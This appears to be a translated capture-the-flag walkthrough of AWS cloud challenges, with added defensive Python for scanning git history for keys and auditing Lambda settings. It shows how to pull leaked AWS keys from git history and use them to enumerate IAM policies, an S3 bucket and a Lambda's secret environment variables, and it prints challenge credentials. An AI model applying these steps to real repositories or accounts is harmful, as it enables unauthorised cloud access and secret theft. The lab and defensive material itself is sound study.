English ver. -> https://hackmd.io/@POkJ8tzYSMKRnIFAFaPw4w/SJnFgxLYj
Recover the Cloud Ring
There is an impressive-looking machine here.
AWS CLI Intro
Difficulty: ★
Try out some basic AWS command line skills in this terminal. Talk to Jill Underpole in the Cloud Ring for hints.
Talking to the person standing next to it gives you a hint.
Hint: In the AWS command line (CLI), the Secure Token Service or STS has one very useful function.
https://awscli.amazonaws.com/v2/documentation/api/latest/reference/sts/get-caller-identity.html
Hm, I see. Opening the console brings up step-by-step instructions, so I just follow them.
You may not know this, but AWS CLI help messages are very easy to access. First, try typing:
$ aws help
As instructed, run aws help.
Great! When you're done, you can quit with q.
Press q to quit.
Next, please configure the default aws cli credentials with the access key AKQAAYRKO7A5Q5XUY2IY,
the secret key qzTscgNdcdwIo/soPKPoJn9sBrl5eMQQL19iO5uf and the region us-east-1 .
https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-quickstart.html#cli-configure-quickstart-config
Type aws configure and enter the values it asks for.
Excellent! To finish, please get your caller identity using the AWS command line. For more details please reference:
$ aws sts help
or reference:
https://awscli.amazonaws.com/v2/documentation/api/latest/reference/sts/index.html
Reading the reference, aws sts get-caller-identity looks like the right command.
Running it clears the challenge.
Before the next challenge...
You can clip through the wall next to the stairs, where there is a treasure chest.
Trufflehog Search
Difficulty: ★★
Use Trufflehog to find secrets in a Git repo. Work with Jill Underpole in the Cloud Ring for hints. What's the name of the file that has AWS credentials?
This challenge has no console.
The task is to find the file containing AWS credentials in https://haugfactory.com/asnowball/aws_scripts.git.
At first glance the repo contains no credentials, so I dig through the commit history instead.
git log -p
That turns up lines such as aws_secret_access_key, showing that credentials were committed in the past. The name of the file they were written to is the answer.
put_policy.py
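What Trufflehog automates here (and what the grep over git log -p in the next challenge does by hand) is scanning every line ever added or removed, not just the current working tree. As an added example that is not part of this write-up or of the repo, the Python below does that over a constructed git log -p sample: the newest commit deletes the credentials, so HEAD is clean, but the older commit that added them is still in the history and is what the scan reports.

```python
import re

# Constructed sample of `git log -p` output (not the real repo's history).
# Newest commit first: it removes the credentials an older commit added.
SAMPLE_GIT_LOG = """\
commit 2222222222222222222222222222222222222222
diff --git a/put_policy.py b/put_policy.py
--- a/put_policy.py
+++ b/put_policy.py
@@ -1,3 +1,1 @@
 import boto3
-aws_access_key_id="AKIAAIDAYRANYAHGQOHD"
-aws_secret_access_key="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"
commit 1111111111111111111111111111111111111111
diff --git a/README.md b/README.md
+++ b/README.md
+# aws_scripts
diff --git a/put_policy.py b/put_policy.py
+++ b/put_policy.py
+import boto3
+aws_access_key_id="AKIAAIDAYRANYAHGQOHD"
+aws_secret_access_key="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"
"""

# Long-term user access key IDs start with AKIA (ASIA for temporary keys)
# followed by 16 upper-case base-32 characters; secret keys are 40
# characters from the base64 alphabet.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[A-Z0-9]{16}\b"),
    "aws_secret_access_key": re.compile(
        r"aws_secret_access_key\s*=\s*['\"]?([A-Za-z0-9/+=]{40})"),
}

def scan_git_log(text):
    """Return (commit, file, pattern) for every added or removed diff line
    that matches a credential pattern."""
    commit = path = None
    findings = []
    for line in text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1]
        elif line.startswith("+++ "):          # file the hunk belongs to
            path = line[4:].removeprefix("b/")
        elif line.startswith(("+", "-")) and not line.startswith(("+++", "---")):
            for name, rx in PATTERNS.items():
                if rx.search(line):
                    findings.append((commit, path, name))
    return findings

def files_with_secrets(text):
    """Distinct file names that ever carried a credential."""
    return sorted({path for _, path, _ in scan_git_log(text)})
```

Rewriting history (or rotating the key) is the fix once a credential is found; deleting the line in a new commit leaves it recoverable, as the sample shows.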
Exploitation via AWS CLI
Difficulty: ★★★
Flex some more advanced AWS CLI skills to escalate privileges! Help Gerty Snowburrow in the Cloud Ring to get hints for this challenge.
This one is also solved by following the on-screen instructions.
Use Trufflehog to find credentials in the Gitlab instance at https://haugfactory.com/asnowball/aws_scripts.git.
Configure these credentials for us-east-1 and then run:
$ aws sts get-caller-identity
Clone the repo and look through it: no credentials in the working tree.
Check whether they are in the history, and there they are.
$ git log -p | grep aws_access_key_id
aws_access_key_id="AKIAAIDAYRANYAHGQOHD"
$ git log -p | grep aws_secret_access_key
aws_secret_access_key="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"
Set them with aws configure, run aws sts get-caller-identity, and the challenge moves on to the next step.
Managed (think: shared) policies can be attached to multiple users. Use the AWS CLI to find any policies attached to your user.
The aws iam command to list attached user policies can be found here:
https://awscli.amazonaws.com/v2/documentation/api/latest/reference/iam/index.html
Hint: it is NOT list-user-policies.
After some googling, aws iam list-attached-user-policies --user-name haug gets it.
$ aws iam list-attached-user-policies --user-name haug
{
  "AttachedPolicies": [
    {
      "PolicyName": "TIER1_READONLY_POLICY",
      "PolicyArn": "arn:aws:iam::602123424321:policy/TIER1_READONLY_POLICY"
    }
  ],
  "IsTruncated": false
}
Now, view or get the policy that is attached to your user.
The aws iam command to get a policy can be found here:
https://awscli.amazonaws.com/v2/documentation/api/latest/reference/iam/index.html
aws iam get-policy --policy-arn 'arn:aws:iam::602123424321:policy/TIER1_READONLY_POLICY'
returns the policy details.
$ aws iam get-policy --policy-arn 'arn:aws:iam::602123424321:policy/TIER1_READONLY_POLICY'
{
  "Policy": {
    "PolicyName": "TIER1_READONLY_POLICY",
    "PolicyId": "ANPAYYOROBUERT7TGKUHA",
    "Arn": "arn:aws:iam::602123424321:policy/TIER1_READONLY_POLICY",
    "Path": "/",
    "DefaultVersionId": "v1",
    "AttachmentCount": 11,
    "PermissionsBoundaryUsageCount": 0,
    "IsAttachable": true,
    "Description": "Policy for tier 1 accounts to have limited read only access to certain resources in IAM, S3, and LAMBDA.",
    "CreateDate": "2022-06-21 22:02:30+00:00",
    "UpdateDate": "2022-06-21 22:10:29+00:00",
    "Tags": []
  }
}
ok.
Attached policies can have multiple versions. View the default version of this policy.
The aws iam command to get a policy version can be found here:
https://awscli.amazonaws.com/v2/documentation/api/latest/reference/iam/index.html
get-policy-version looks like the one to use.
aws iam get-policy-version --policy-arn 'arn:aws:iam::602123424321:policy/TIER1_READONLY_POLICY' --version-id 'v1'
The previous output said the default version is v1, so I used that.
Inline policies are policies that are unique to a particular identity or resource. Use the AWS CLI to list the inline policies associated with your user.
The aws iam command to list user policies can be found here:
https://awscli.amazonaws.com/v2/documentation/api/latest/reference/iam/index.html
Hint: it is NOT list-attached-user-policies.
aws iam list-user-policies --user-name haug gets it.
$ aws iam list-user-policies --user-name haug
{
  "PolicyNames": [ "S3Perms" ],
  "IsTruncated": false
}
Now, use the AWS CLI to get the only inline policy for your user.
The aws iam command to get a user policy can be found here:
https://awscli.amazonaws.com/v2/documentation/api/latest/reference/iam/index.html
aws iam get-user-policy --user-name haug --policy-name S3Perms works.
$ aws iam get-user-policy --user-name haug --policy-name S3Perms
{
  "UserPolicy": {
    "UserName": "haug",
    "PolicyName": "S3Perms",
    "PolicyDocument": {
      "Version": "2012-10-17",
      "Statement": [
        {
          "Effect": "Allow",
          "Action": [ "s3:ListObjects" ],
          "Resource": [
            "arn:aws:s3:::smogmachines3",
            "arn:aws:s3:::smogmachines3/*"
          ]
        }
      ]
    }
  },
  "IsTruncated": false
}
The inline user policy named S3Perms disclosed the name of an S3 bucket that you have permissions to list objects.
List those objects!
The aws s3api command to list objects in an s3 bucket can be found here:
https://awscli.amazonaws.com/v2/documentation/api/latest/reference/s3api/index.html
aws s3api list-objects --bucket smogmachines3 works.
The attached user policy provided you several Lambda privileges. Use the AWS CLI to list Lambda functions.
The aws lambda command to list functions can be found here:
https://awscli.amazonaws.com/v2/documentation/api/latest/reference/lambda/index.html
aws lambda list-functions works.
$ aws lambda list-functions
{
  "Functions": [
    {
      "FunctionName": "smogmachine_lambda",
      "FunctionArn": "arn:aws:lambda:us-east-1:602123424321:function:smogmachine_lambda",
      "Runtime": "python3.9",
      "Role": "arn:aws:iam::602123424321:role/smogmachine_lambda",
      "Handler": "handler.lambda_handler",
      "CodeSize": 2126,
      "Description": "",
      "Timeout": 600,
      "MemorySize": 256,
      "LastModified": "2022-09-07T19:28:23.634+0000",
      "CodeSha256": "GFnsIZfgFNA1JZP3TgTI0tIavOpDLiYlg7oziWbtRsa=",
      "Version": "$LATEST",
      "VpcConfig": {
        "SubnetIds": [ "subnet-8c80a9cb8b3fa5505" ],
        "SecurityGroupIds": [ "sg-b51a01f5b4711c95c" ],
        "VpcId": "vpc-85ea8596648f35e00"
      },
      "Environment": {
        "Variables": {
          "LAMBDASECRET": "975ceab170d61c75",
          "LOCALMNTPOINT": "/mnt/smogmachine_files"
        }
      },
      "TracingConfig": { "Mode": "PassThrough" },
      "RevisionId": "7e198c3c-d4ea-48dd-9370-e5238e9ce06e",
      "FileSystemConfigs": [
        {
          "Arn": "arn:aws:elasticfilesystem:us-east-1:602123424321:access-point/fsap-db3277b03c6e975d2",
          "LocalMountPath": "/mnt/smogmachine_files"
        }
      ],
      "PackageType": "Zip",
      "Architectures": [ "x86_64" ],
      "EphemeralStorage": { "Size": 512 }
    }
  ]
}
Lambda functions can have public URLs from which they are directly accessible.
Use the AWS CLI to get the configuration containing the public URL of the Lambda function.
The aws lambda command to get the function URL config can be found here:
https://awscli.amazonaws.com/v2/documentation/api/latest/reference/lambda/index.html
aws lambda get-function-url-config --function-name smogmachine_lambda works.
$ aws lambda get-function-url-config --function-name smogmachine_lambda
{
  "FunctionUrl": "https://rxgnav37qmvqxtaksslw5vwwjm0suhwc.lambda-url.us-east-1.on.aws/",
  "FunctionArn": "arn:aws:lambda:us-east-1:602123424321:function:smogmachine_lambda",
  "AuthType": "AWS_IAM",
  "Cors": {
    "AllowCredentials": false,
    "AllowHeaders": [],
    "AllowMethods": [ "GET", "POST" ],
    "AllowOrigins": [ "*" ],
    "ExposeHeaders": [],
    "MaxAge": 0
  },
  "CreationTime": "2022-09-07T19:28:23.808713Z",
  "LastModifiedTime": "2022-09-07T19:28:23.808713Z"
}
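The enumeration chain above ends at a Lambda whose environment variables (including one literally named LAMBDASECRET) and function-URL settings are readable with nothing more than the tier-1 read-only policy: list-functions returns environment variables in plaintext to any principal allowed to call it. As an added example, not part of this write-up or the challenge, the Python below takes the two JSON documents the CLI returned (constructed here and trimmed to the fields it checks) and flags what a reviewer would ask to fix: secret-looking environment variables, an unauthenticated function URL, and wildcard CORS.

```python
# Constructed inputs mirroring the list-functions and
# get-function-url-config output above, trimmed to the audited fields.
FUNCTION_CONFIG = {
    "FunctionName": "smogmachine_lambda",
    "Role": "arn:aws:iam::602123424321:role/smogmachine_lambda",
    "Environment": {"Variables": {
        "LAMBDASECRET": "975ceab170d61c75",
        "LOCALMNTPOINT": "/mnt/smogmachine_files",
    }},
}
URL_CONFIG = {
    "FunctionUrl": "https://rxgnav37qmvqxtaksslw5vwwjm0suhwc.lambda-url.us-east-1.on.aws/",
    "AuthType": "AWS_IAM",
    "Cors": {"AllowCredentials": False,
             "AllowMethods": ["GET", "POST"],
             "AllowOrigins": ["*"]},
}

# Variable-name fragments that usually mean a secret is stored inline
# instead of in Secrets Manager / Parameter Store.
SECRET_NAME_HINTS = ("SECRET", "KEY", "TOKEN", "PASSWORD", "PASS")

def audit_function(fn, url_cfg=None):
    """Return (severity, message) findings for one function configuration
    and, optionally, its function URL configuration."""
    findings = []
    env = fn.get("Environment", {}).get("Variables", {})
    for name in env:
        if any(h in name.upper() for h in SECRET_NAME_HINTS):
            findings.append(("HIGH", f"env var {name} looks like a secret; "
                             "visible to anyone with lambda:ListFunctions"))
    if url_cfg:
        auth = url_cfg.get("AuthType")
        if auth == "NONE":
            findings.append(("HIGH", "function URL is public (AuthType NONE)"))
        else:
            findings.append(("INFO", f"function URL present, AuthType {auth}"))
        cors = url_cfg.get("Cors") or {}
        if "*" in cors.get("AllowOrigins", []):
            findings.append(("MEDIUM", "CORS allows any origin"))
            if cors.get("AllowCredentials"):
                findings.append(("HIGH", "CORS sends credentials to any origin"))
    return findings

if __name__ == "__main__":
    for severity, message in audit_function(FUNCTION_CONFIG, URL_CONFIG):
        print(f"[{severity}] {FUNCTION_CONFIG['FunctionName']}: {message}")
```

The name-based check is a heuristic; it catches LAMBDASECRET here but a secret stored under a neutral name still needs the Secrets Manager move.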
That clears it. This was apparently the boss challenge, and it awards the ring. Cute ring.
Before the last ring...
Going right from the Burning Ring Of Fire, there is a treasure chest.
You get some money and a strange hat.